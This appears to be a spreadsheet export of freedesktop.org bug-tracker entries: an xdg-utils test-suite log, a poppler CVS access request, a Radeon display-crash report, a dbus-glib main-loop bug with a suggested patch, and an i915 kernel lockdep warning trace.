'xdgtestdata-xdgt2006-08-27-165050.388083000-1291-menu_install.menu' in
'/usr/local/share:/usr/share:/etc/xdg'
Test has already failed. Not bothering to ask 'Is there a menu in  called
'TEST MENU 08-27+26'?
	(NOTE: If you are using KDE it may take a few seconds for the menu to appear.)'
Test has already failed. Not bothering to ask 'Are there exactly 2 items in
'/TEST MENU 08-27+26' called 'EXTRA ITEM' and 'TEST 08-27+26'?'
Test has already failed. Not bothering to ask 'Please select the menu item
'/TEST MENU 08-27+26/TEST 08-27+26''
'/home/fun/xdg-utils-1.0beta3/tests/tmp/xdgt2006-08-27-165050.388083000-1291-1238/xdgtestdata-xdgt2006-08-27-165050.388083000-1291-xdg-test-menu-item-install.tmp'
does not exist
[Sun Aug 27 16:50:51 CEST 2006] test_menu_system_uninstall: verify a system menu
is removed correctly: NORESULT 
Did not find
'xdgtestdata-xdgt2006-08-27-165051.226668000-23338-menu_install.menu' in
'/usr/local/share:/usr/share:/etc/xdg'
Test has already failed. Not bothering to ask 'Is the menu '/MENU 08-27+27
present with items 'EXTRA_ITEM' and 'TEST 08-27+27'.
	(NOTE: If you are using KDE it may take a few seconds to appear.)'
Initilization failed!
[Sun Aug 27 16:50:51 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-icon-resource: PASS
[Sun Aug 27 16:50:51 CEST 2006] generic_help: generic help message -
xdg-icon-resource: PASS
[Sun Aug 27 16:50:51 CEST 2006] generic_manual: generic manual -
xdg-icon-resource: PASS
[Sun Aug 27 16:50:51 CEST 2006] generic_no_arg: generic noarg -
xdg-icon-resource: PASS
[Sun Aug 27 16:50:51 CEST 2006] generic_version: generic version arg -
xdg-icon-resource: PASS
[Sun Aug 27 16:50:51 CEST 2006] test_icon_duplicate_install: verify red-16.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_duplicate_install: verify red-22.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_duplicate_install: verify red-24.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_duplicate_install: verify red-32.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_duplicate_install: verify red-48.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_duplicate_install: verify red-64.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_duplicate_install: verify red-128.png
is installed correctly after already being installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-16.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-22.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-24.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-32.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-48.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-64.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:52 CEST 2006] test_icon_nonexist_uninstall: verify red-128.png
is uninstalled correctly even if it is not installed: PASS
[Sun Aug 27 16:50:53 CEST 2006] test_icon_svg_duplicate_install: verify
red-SVG.svg is installed correctly when it has already been installed.: PASS
[Sun Aug 27 16:50:53 CEST 2006] test_icon_svg_nonexist_uninstall: verify
red-SVG.svg is uninstalled correctly: PASS
[Sun Aug 27 16:50:53 CEST 2006] test_icon_svg_system_install: verify red-SVG.svg
is installed correctly with --mode system: PASS
[Sun Aug 27 16:50:54 CEST 2006] test_icon_svg_system_uninstall: verify
red-SVG.svg is uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:54 CEST 2006] test_icon_svg_user_install: verify red-SVG.svg
is installed correctly: PASS
[Sun Aug 27 16:50:54 CEST 2006] test_icon_svg_user_uninstall: verify red-SVG.svg
is uninstalled correctly: PASS
[Sun Aug 27 16:50:54 CEST 2006] test_icon_system_as_nonroot: verify error for
--mode system when run as a normal user: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:50:54 CEST 2006] test_icon_system_install: verify red-16.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:54 CEST 2006] test_icon_system_install: verify red-22.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:55 CEST 2006] test_icon_system_install: verify red-24.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:55 CEST 2006] test_icon_system_install: verify red-32.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:56 CEST 2006] test_icon_system_install: verify red-48.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:56 CEST 2006] test_icon_system_install: verify red-64.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:56 CEST 2006] test_icon_system_install: verify red-128.png is
installed correctly with --mode system: PASS
[Sun Aug 27 16:50:57 CEST 2006] test_icon_system_uninstall: verify red-16.png is
uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:57 CEST 2006] test_icon_system_uninstall: verify red-22.png is
uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:57 CEST 2006] test_icon_system_uninstall: verify red-24.png is
uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:58 CEST 2006] test_icon_system_uninstall: verify red-32.png is
uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:58 CEST 2006] test_icon_system_uninstall: verify red-48.png is
uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:58 CEST 2006] test_icon_system_uninstall: verify red-64.png is
uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_system_uninstall: verify red-128.png
is uninstalled correctly with --mode system: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-16.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-22.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-24.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-32.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-48.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-64.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_install: verify red-128.png is
installed correctly: PASS
[Sun Aug 27 16:50:59 CEST 2006] test_icon_user_uninstall: verify red-16.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] test_icon_user_uninstall: verify red-22.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] test_icon_user_uninstall: verify red-24.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] test_icon_user_uninstall: verify red-32.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] test_icon_user_uninstall: verify red-48.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] test_icon_user_uninstall: verify red-64.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] test_icon_user_uninstall: verify red-128.png is
uninstalled correctly: PASS
[Sun Aug 27 16:51:00 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-mime: PASS
[Sun Aug 27 16:51:00 CEST 2006] generic_help: generic help message - xdg-mime: PASS
[Sun Aug 27 16:51:00 CEST 2006] generic_manual: generic manual - xdg-mime: PASS
[Sun Aug 27 16:51:00 CEST 2006] generic_no_arg: generic noarg - xdg-mime: PASS
[Sun Aug 27 16:51:00 CEST 2006] generic_version: generic version arg - xdg-mime:
PASS
[Sun Aug 27 16:51:00 CEST 2006] test_query_text_plain: verify a query against
testfile.txt returns 'text/plain': UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_query_missing_file: verify correct error
for missing file: non-existant-file.xml: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_system_as_nonroot: verify error for --mode
system when run as a normal user: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_user_mime_install: install user mime type:
UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_user_mime_uninstall: uninstall user mime
type: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_user_install_missing_file: install mime
type as user with missing file non-existant-file.xml: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_notexist_mime_uninstall: uninstall mime
type that is not present: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_user_mime_install2in1: install user mime
type 2 in 1 file: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:00 CEST 2006] test_user_mime_uninstall2in1: uninstall user
mime type: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:01 CEST 2006] test_system_mime_install: install system mime
type: PASS
[Sun Aug 27 16:51:02 CEST 2006] test_system_mime_uninstall: uninstall system
mime type: PASS
[Sun Aug 27 16:51:02 CEST 2006] test_system_install_missing_file: install mime
type as system with missing file non-existant-file.xml: PASS
[Sun Aug 27 16:51:02 CEST 2006] test_double_mime_install: verify installing an
existing mime type is OK: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:02 CEST 2006] test_default_mime_launch: verify we can install
a mime type &amp; associate it with an applciation: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:51:02 CEST 2006] test_file_icon: ensure that associations with
filetypes is correct.: PASS
[Sun Aug 27 16:51:57 CEST 2006] test_desktop_file_icon: ensure that associations
with filetypes is correct.: PASS
[Sun Aug 27 16:52:24 CEST 2006] test_svg_icon_render: ensure that SVG icons are
rendered: FAIL 
User indicated 'n' instead of 'y' in respnonse to 'Does the icon consist of the
red text 'SVG'?
	(You may need to select something like 'View-&gt;As Icons')'
[Sun Aug 27 16:54:39 CEST 2006] ---- root run end: 3 tests failed 83 of 90
tests passed. (103 attempted)
[dim aoÃ» 27 16:54:39 CEST 2006] ---- normal user run start: 
[dim aoÃ» 27 16:54:39 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-desktop-icon: PASS
[dim aoÃ» 27 16:54:39 CEST 2006] generic_help: generic help message -
xdg-desktop-icon: PASS
[dim aoÃ» 27 16:54:39 CEST 2006] generic_manual: generic manual -
xdg-desktop-icon: PASS
[dim aoÃ» 27 16:54:39 CEST 2006] generic_no_arg: generic noarg -
xdg-desktop-icon: PASS
[dim aoÃ» 27 16:54:39 CEST 2006] generic_version: generic version arg -
xdg-desktop-icon: PASS
[dim aoÃ» 27 16:54:40 CEST 2006] test_notexist_file_uninstall: verify
uninstalling pain_file_uninstall.txt does not cause an error if it is not
installed.: PASS
[dim aoÃ» 27 16:54:40 CEST 2006] test_plain_file_install: verify testfile.html is
installed correctly on the desktop: NORESULT 
Found './xdgtestdata-08-27+110.txt' in
Initilization failed!
[dim aoÃ» 27 16:54:42 CEST 2006] test_plain_file_uninstall: verify testfile.html
is uninstalled correctly from the desktop: NORESULT 
User indicated 'n' instead of 'y' in respnonse to 'Is an icon named
'xdgtestdata-08-27+111.txt' present on the desktop?'
Initilization failed!
[dim aoÃ» 27 16:55:03 CEST 2006] test_desktop_icon_install: verify a desktop file
installed correctly on the desktop: FAIL 
User indicated 'n' instead of 'y' in respnonse to 'Is there an icon on the
desktop with name 'Install 08-27+112'?'
Test has already failed. Not bothering to ask 'Please double click the 'Install
08-27+112' icon.'
'/home/fun/xdgtestdata-xdgt2006-08-27-165503.042644000-2454-xdg-test-desktop-icon-install.tmp'
does not exist
[dim aoÃ» 27 16:55:06 CEST 2006] test_desktop_icon_uninstall: verify desktop file
is uninstalled correctly from the desktop: NORESULT 
User indicated 'n' instead of 'y' in respnonse to 'Is an icon named 'Uninstall
08-27+113' present on the desktop?'
Initilization failed!
[dim aoÃ» 27 16:55:09 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-desktop-menu: PASS
[dim aoÃ» 27 16:55:10 CEST 2006] generic_help: generic help message -
xdg-desktop-menu: PASS
[dim aoÃ» 27 16:55:10 CEST 2006] generic_manual: generic manual -
xdg-desktop-menu: PASS
[dim aoÃ» 27 16:55:10 CEST 2006] generic_no_arg: generic noarg -
xdg-desktop-menu: PASS
[dim aoÃ» 27 16:55:10 CEST 2006] generic_version: generic version arg -
xdg-desktop-menu: PASS
[dim aoÃ» 27 16:55:10 CEST 2006] test_menu_user_forceupdate: verify forceupdate
doesn't error for --mode user: PASS
[dim aoÃ» 27 16:55:10 CEST 2006] test_menu_system_as_nonroot: verify error for
--mode system when run as a normal user: PASS
[dim aoÃ» 27 16:55:18 CEST 2006] test_menu_system_forceupdate: verify forceupdate
doesn't error for --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 16:55:18 CEST 2006] test_simple_menu_item_user_install: verify a
desktop file is installed in the user's applications menu: WARN 
User indicated 'n' instead of 'y' in respnonse to 'Is an item called 'TEST
08-27+122' somewhere in the menu tree possibly in a generic location?
	(NOTE: If you are using KDE it may take a few seconds to appear.)'
Test has already failed. Not bothering to ask 'Please select the menu item 'TEST
08-27+122''
'/home/fun/xdg-utils-1.0beta3/tests/tmp/xdgt2006-08-27-165518.216978000-17284-1192/xdgtestdata-xdgt2006-08-27-165518.216978000-17284-xdg-test-menu-item-install.tmp'
does not exist
[dim aoÃ» 27 16:57:15 CEST 2006] test_simple_menu_item_user_uninstall: verify a
desktop file is uninstalled from the user applications menu: NORESULT 
User indicated 'n' instead of 'y' in respnonse to 'Is an item called 'TEST
08-27+123' somewhere in the menu tree possibly in a generic location?
	(NOTE: If you are using KDE it may take a few seconds to appear.)'
Initilization failed!
[dim aoÃ» 27 16:57:26 CEST 2006] test_menu_user_install: verify a user menu is
created correctly: PASS
[dim aoÃ» 27 16:58:24 CEST 2006] test_menu_user_uninstall: verify a user menu is
removed correctly: PASS
[dim aoÃ» 27 16:59:03 CEST 2006] test_menu_install_category: verify a desktop
file is installed in the correct category: PASS
[dim aoÃ» 27 16:59:17 CEST 2006] test_simple_menu_item_system_install: verify a
desktop file is installed in the system applications menu: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 16:59:17 CEST 2006] test_simple_menu_item_system_uninstall: verify a
desktop file is uninstalled from the system applications menu: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 16:59:17 CEST 2006] test_menu_system_install: verify a system menu
is created correctly: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 16:59:17 CEST 2006] test_menu_system_uninstall: verify a system menu
is removed correctly: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 16:59:17 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-email: PASS
[dim aoÃ» 27 16:59:18 CEST 2006] generic_help: generic help message - xdg-email: PASS
[dim aoÃ» 27 16:59:18 CEST 2006] generic_manual: generic manual - xdg-email: PASS
[dim aoÃ» 27 16:59:18 CEST 2006] generic_no_arg: generic noarg - xdg-email: PASS
[dim aoÃ» 27 16:59:18 CEST 2006] generic_version: generic version arg -
xdg-email: PASS
[dim aoÃ» 27 16:59:18 CEST 2006] test_email_basic: verify basic email compose: PASS
[dim aoÃ» 27 16:59:38 CEST 2006] test_email_basic: verify basic email compose: PASS
[dim aoÃ» 27 16:59:46 CEST 2006] test_email_subj: verify subject argument works: PASS
[dim aoÃ» 27 16:59:55 CEST 2006] test_cc_args: verify cc/bcc/subject/body/attach
arguments work: PASS
[dim aoÃ» 27 17:00:21 CEST 2006] test_multi_address: verify multiple to/cc/bcc
arguments work: PASS
[dim aoÃ» 27 17:00:39 CEST 2006] test_email_uri: verify uri email compose: PASS
[dim aoÃ» 27 17:00:53 CEST 2006] test_email_uri_multi_address: verify uri email
compose: PASS
[dim aoÃ» 27 17:01:39 CEST 2006] test_email_mix_args_uri: verify an email is
generated correctly when called with both a uri and not.: PASS
[dim aoÃ» 27 17:01:53 CEST 2006] test_email_attach: verify attach argument works:
PASS
[dim aoÃ» 27 17:02:15 CEST 2006] test_email_attach_full_path: verify attach
argument works: PASS
[dim aoÃ» 27 17:02:25 CEST 2006] test_email_missing_attach: verify an error when
--attach does not have a valid file: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-icon-resource: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] generic_help: generic help message -
xdg-icon-resource: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] generic_manual: generic manual -
xdg-icon-resource: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] generic_no_arg: generic noarg -
xdg-icon-resource: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] generic_version: generic version arg -
xdg-icon-resource: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] test_icon_duplicate_install: verify red-16.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] test_icon_duplicate_install: verify red-22.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:35 CEST 2006] test_icon_duplicate_install: verify red-24.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:36 CEST 2006] test_icon_duplicate_install: verify red-32.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:36 CEST 2006] test_icon_duplicate_install: verify red-48.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:36 CEST 2006] test_icon_duplicate_install: verify red-64.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:36 CEST 2006] test_icon_duplicate_install: verify red-128.png
is installed correctly after already being installed: PASS
[dim aoÃ» 27 17:02:36 CEST 2006] test_icon_nonexist_uninstall: verify red-16.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_nonexist_uninstall: verify red-22.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_nonexist_uninstall: verify red-24.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_nonexist_uninstall: verify red-32.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_nonexist_uninstall: verify red-48.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_nonexist_uninstall: verify red-64.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_nonexist_uninstall: verify red-128.png
is uninstalled correctly even if it is not installed: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_svg_duplicate_install: verify
red-SVG.svg is installed correctly when it has already been installed.: PASS
[dim aoÃ» 27 17:02:37 CEST 2006] test_icon_svg_nonexist_uninstall: verify
red-SVG.svg is uninstalled correctly: PASS
[dim aoÃ» 27 17:02:38 CEST 2006] test_icon_svg_system_install: verify red-SVG.svg
is installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:38 CEST 2006] test_icon_svg_system_uninstall: verify
red-SVG.svg is uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:40 CEST 2006] test_icon_svg_user_install: verify red-SVG.svg
is installed correctly: PASS
[dim aoÃ» 27 17:02:40 CEST 2006] test_icon_svg_user_uninstall: verify red-SVG.svg
is uninstalled correctly: PASS
[dim aoÃ» 27 17:02:40 CEST 2006] test_icon_system_as_nonroot: verify error for
--mode system when run as a normal user: PASS
[dim aoÃ» 27 17:02:45 CEST 2006] test_icon_system_install: verify red-16.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:45 CEST 2006] test_icon_system_install: verify red-22.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:45 CEST 2006] test_icon_system_install: verify red-24.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:45 CEST 2006] test_icon_system_install: verify red-32.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:45 CEST 2006] test_icon_system_install: verify red-48.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_install: verify red-64.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_install: verify red-128.png is
installed correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-16.png is
uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-22.png is
uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-24.png is
uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-32.png is
uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-48.png is
uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-64.png is
uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_system_uninstall: verify red-128.png
is uninstalled correctly with --mode system: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_user_install: verify red-16.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_user_install: verify red-22.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_user_install: verify red-24.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_user_install: verify red-32.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:46 CEST 2006] test_icon_user_install: verify red-48.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:47 CEST 2006] test_icon_user_install: verify red-64.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:47 CEST 2006] test_icon_user_install: verify red-128.png is
installed correctly: PASS
[dim aoÃ» 27 17:02:47 CEST 2006] test_icon_user_uninstall: verify red-16.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:47 CEST 2006] test_icon_user_uninstall: verify red-22.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:47 CEST 2006] test_icon_user_uninstall: verify red-24.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:47 CEST 2006] test_icon_user_uninstall: verify red-32.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] test_icon_user_uninstall: verify red-48.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] test_icon_user_uninstall: verify red-64.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] test_icon_user_uninstall: verify red-128.png is
uninstalled correctly: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-mime: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] generic_help: generic help message - xdg-mime: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] generic_manual: generic manual - xdg-mime: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] generic_no_arg: generic noarg - xdg-mime: PASS
[dim aoÃ» 27 17:02:48 CEST 2006] generic_version: generic version arg - xdg-mime:
PASS
[dim aoÃ» 27 17:02:48 CEST 2006] test_query_text_plain: verify a query against
testfile.txt returns 'text/plain': PASS
[dim aoÃ» 27 17:02:49 CEST 2006] test_query_missing_file: verify correct error
for missing file: non-existant-file.xml: PASS
[dim aoÃ» 27 17:02:49 CEST 2006] test_system_as_nonroot: verify error for --mode
system when run as a normal user: PASS
[dim aoÃ» 27 17:02:49 CEST 2006] test_user_mime_install: install user mime type: PASS
[dim aoÃ» 27 17:02:51 CEST 2006] test_user_mime_uninstall: uninstall user mime
type: PASS
[dim aoÃ» 27 17:02:51 CEST 2006] test_user_install_missing_file: install mime
type as user with missing file non-existant-file.xml: PASS
[dim aoÃ» 27 17:02:51 CEST 2006] test_notexist_mime_uninstall: uninstall mime
type that is not present: PASS
[dim aoÃ» 27 17:02:51 CEST 2006] test_user_mime_install2in1: install user mime
type 2 in 1 file: PASS
[dim aoÃ» 27 17:02:52 CEST 2006] test_user_mime_uninstall2in1: uninstall user
mime type: PASS
[dim aoÃ» 27 17:02:53 CEST 2006] test_system_mime_install: install system mime
type: UNTESTED 
not running as root but test requires root privileges
[dim aoÃ» 27 17:02:53 CEST 2006] test_system_mime_uninstall: uninstall system
mime ty</t>
  </si>
  <si>
    <t>rafael.carre</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-3161</t>
  </si>
  <si>
    <t>jrb encouraged me to ask for poppler cvs access. Please add this account:
Real name:
    Martin Kretzschmar
Email address:
    m_kretzschmar@gmx.net
Preferred account name:
    martink</t>
  </si>
  <si>
    <t>m_kretzschmar</t>
  </si>
  <si>
    <t>DRI-58372</t>
  </si>
  <si>
    <t>[KMS][Cayman] Garbled screen and gpu crash with 6950 with drm-next</t>
  </si>
  <si>
    <t>Created attachment 71594
dmesg with drm-next
Using linus + airlied's drm-next produces garbled screen and gpu crashes after login.
Using mesa git and xf86-ati git.</t>
  </si>
  <si>
    <t>DBUS-23633</t>
  </si>
  <si>
    <t>add regression test for using a non-default mainloop context</t>
  </si>
  <si>
    <t>Dbus-Glib has a bug where it doesn't process events to a non-default main loop context.  
e.g. (does not work)
DBusGConnection *bus
GError *error = NULL
GMainContext *context = g_main_context_new()         
GMainLoop *mainloop = g_main_loop_new (context FALSE)
bus = dbus_g_bus_get(DBUS_BUS_SESSION 
dbus_connection_setup_with_g_main (dbus_g_connection_get_connection(bus) context) 
--------------
I looked into this problem and this is what I found out (in dbus/dbus-gmain.c):
When DBus-GLib switches to a new context it calls add_watch() to attach an IOHandler to poll the file descriptor used for communication.  Immediately afterward DBus invokes DBus-GLib's remove_watch() function which removes the new IOHandler instead of the one corresponding to the previous context.  Also the previous IOHandler should be already freed the second time connection_setup_add_watch is called (line 277:   dbus_watch_set_data (watch handler io_handler_watch_freed) ).  
I believe remove_watch() should not be called after add_watch().
----------------
Suggested Patch:
diff -urN dbus-glib-orig/dbus/dbus-gmain.c dbus-glib-patched/dbus/dbus-gmain.c
--- dbus-glib-orig/dbus/dbus-gmain.c    2009-09-01 17:09:06.919358522 -0400
+++ dbus-glib-patched/dbus/dbus-gmain.c 2009-09-01 17:25:41.237368327 -0400
@@ -5917 +5917 @@
   if (!dbus_connection_set_watch_functions (connection
                                             add_watch
-                                            remove_watch
+                                            NULL
                                             watch_toggled
                                             cs NULL))
     goto nomem</t>
  </si>
  <si>
    <t>david.tucker</t>
  </si>
  <si>
    <t>DRI-110869</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@gem_ctx_engines@execute-one(forall)? - dmesg-warn WARNING: inconsistent lock state</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_6208/shard-snb2/igt@gem_ctx_engines@execute-one.html
 [933.272564] Console: switching to colour dummy device 80x25
 [933.272617] [IGT] gem_ctx_engines: executing
 [933.275973] [IGT] gem_ctx_engines: starting subtest execute-one
 [933.285189] 
 [933.285193] ================================
 [933.285195] WARNING: inconsistent lock state
 [933.285198] 5.2.0-rc3-CI-CI_DRM_6208+ #1 Tainted: G     U           
 [933.285201] --------------------------------
 [933.285204] inconsistent {SOFTIRQ-ON-W} -&gt; {IN-SOFTIRQ-W} usage.
 [933.285207] gem_ctx_engines/3260 [HC0[0]:SC1[1]:HE1:SE0] takes:
 [933.285211] 000000002df401ad (&amp;(&amp;i915-&gt;mm.obj_lock)-&gt;rlock){+.?.} at: i915_gem_free_object+0xb4/0x1d0 [i915]
 [933.285268] {SOFTIRQ-ON-W} state was registered at:
 [933.285273]   lock_acquire+0xa6/0x1c0
 [933.285277]   _raw_spin_lock+0x2a/0x40
 [933.285319]   __i915_vma_do_pin+0x58c/0xdf0 [i915]
 [933.285359]   i915_gem_init+0x2d8/0xac0 [i915]
 [933.285389]   i915_driver_load+0xdc0/0x18b0 [i915]
 [933.285419]   i915_pci_probe+0x3f/0x1a0 [i915]
 [933.285423]   pci_device_probe+0x9e/0x120
 [933.285427]   really_probe+0xea/0x3c0
 [933.285429]   driver_probe_device+0x10b/0x120
 [933.285432]   device_driver_attach+0x4a/0x50
 [933.285436]   __driver_attach+0x97/0x130
 [933.285438]   bus_for_each_dev+0x74/0xc0
 [933.285442]   bus_add_driver+0x13f/0x210
 [933.285445]   driver_register+0x56/0xe0
 [933.285449]   do_one_initcall+0x58/0x300
 [933.285453]   do_init_module+0x56/0x1f6
 [933.285456]   load_module+0x24d1/0x2990
 [933.285459]   __se_sys_finit_module+0xd3/0xf0
 [933.285462]   do_syscall_64+0x55/0x1c0
 [933.285465]   entry_SYSCALL_64_after_hwframe+0x49/0xbe
 [933.285468] irq event stamp: 52646
 [933.285473] hardirqs last  enabled at (52646): [] __slab_free+0x3e8/0x4f0
